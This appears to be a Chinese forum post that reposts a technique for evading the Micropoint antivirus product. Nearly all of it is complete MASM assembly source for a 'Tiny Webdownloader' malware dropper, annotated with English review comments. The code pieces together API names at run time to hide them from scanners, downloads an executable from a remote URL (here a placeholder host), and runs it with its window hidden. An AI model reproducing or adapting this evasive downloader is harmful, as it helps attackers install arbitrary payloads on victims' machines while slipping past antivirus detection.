xiahanxing 
#1  我从别处看到的一种病毒通过微点的思路
  
我从别处看到的一种病毒通过微点的思路
转载过来 微点研发人员看看 hoho  
 
过微点的方法(源码) 
不被微点报的前提是:不访问网络,不生孩子。(注意:下面的源码本身会联网下载文件并运行它。)
 
;Tiny Webdownloader by Aphex 
;Hides use of URLDownloadToFileA to foil TDS  
;http://iamaphex.cjb.net 
;unremote@knology.net 
 
 
.386 
.model flat, stdcall 
include \masm32\include\kernel32.inc 
includelib \masm32\lib\kernel32.lib 
 
; Initialised data (MASM, 32-bit flat model).
;   Url  - download source; the value here is a placeholder host.
;   Exe  - local file name the download is saved under. It is a bare relative
;          name, so the file is created in the process's current directory.
;   Scramble1..9 - fragments of the strings "urlmon.dll" and
;          "URLDownloadToFileA". The complete strings never appear
;          contiguously in the image; _main joins them at run time.
; Review note: the fragmentation only defeats a scan for the full strings.
; The individual fragments are still present in .data, and the kernel32
; functions called via invoke (LoadLibrary, GetProcAddress, lstrcat, WinExec,
; DeleteFile) are linked through kernel32.lib and so should still be visible
; as ordinary imports.
.data
Url byte 'http://your.isp.goes.here/file.exe', 0
Exe byte '~.exe', 0
Scramble1 byte 'dll', 0
Scramble2 byte '.', 0
Scramble3 byte 'mon', 0
Scramble4 byte 'url', 0
Scramble5 byte 'A', 0
Scramble6 byte 'File', 0
Scramble7 byte 'To', 0
Scramble8 byte 'Download', 0
Scramble9 byte 'URL', 0
 
; Uninitialised data: run-time buffers and resolved handles.
;   UrlMonDll         - receives the joined DLL name; 11 bytes is exactly
;                       len("urlmon.dll") + 1 for the terminator, no slack.
;   UrlDownload       - receives the joined export name; 19 bytes is exactly
;                       len("URLDownloadToFileA") + 1, no slack.
;   UrlMon            - module handle returned by LoadLibrary.
;   UrlDownloadToFile - function pointer returned by GetProcAddress.
.data?
UrlMonDll byte 11 dup (?)
UrlDownload byte 19 dup (?)
UrlMon dword ?
UrlDownloadToFile dword ?
 
; Program entry point (stdcall, 32-bit). Sequence:
;   1. join the string fragments into "urlmon.dll" and "URLDownloadToFileA"
;   2. LoadLibrary + GetProcAddress to resolve the export at run time, so
;      urlmon.dll does not need to be linked as an import
;   3. delete any earlier copy of Exe, download Url to Exe, execute Exe, exit
; Behaviour visible at run time regardless of the string hiding: urlmon.dll is
; loaded dynamically, a file named ~.exe is written to the current directory
; from an HTTP URL, and a child process is started from that file.
; No return value is checked anywhere in this routine.
.code
_main:
;unscrambles urlmon.dll
; lstrcpyn's length argument counts the terminator, so 4 copies the three
; characters of 'url' plus a NUL; this gives lstrcat a terminated string to
; append to.
invoke lstrcpyn, addr UrlMonDll, addr Scramble4, 4
invoke lstrcat, addr UrlMonDll, addr Scramble3
invoke lstrcat, addr UrlMonDll, addr Scramble2
invoke lstrcat, addr UrlMonDll, addr Scramble1

;unscrambles URLDownloadToFileA
; Same pattern: 'URL' first, then 'Download', 'To', 'File', 'A'.
invoke lstrcpyn, addr UrlDownload, addr Scramble9, 4
invoke lstrcat, addr UrlDownload, addr Scramble8
invoke lstrcat, addr UrlDownload, addr Scramble7
invoke lstrcat, addr UrlDownload, addr Scramble6
invoke lstrcat, addr UrlDownload, addr Scramble5

;loads urlmon.dll
; The handle is stored without a NULL check.
invoke LoadLibrary, addr UrlMonDll
mov UrlMon, eax

;links URLDownloadToFileA dynamically
; The pointer is stored without a NULL check; if either lookup failed, the
; indirect call below goes through a null pointer.
invoke GetProcAddress, UrlMon, addr UrlDownload
mov UrlDownloadToFile, eax

;delete previous version
invoke DeleteFile, addr Exe

;downloads the exe
; Manual stdcall call, arguments pushed right to left:
;   URLDownloadToFileA(pCaller = NULL, szURL = Url, szFileName = Exe,
;                      dwReserved = 0, lpfnCB = NULL)
; The HRESULT left in eax is ignored.
push 0
push 0
push offset Exe
push offset Url
push 0
call UrlDownloadToFile

;runs the exe
; Second argument 0 is uCmdShow = SW_HIDE (no visible window). This runs
; whatever is at Exe even when the download above did not succeed, and the
; downloaded content is not verified in any way before execution.
invoke WinExec, addr Exe, 0

;exits
invoke ExitProcess, 0

end _main
  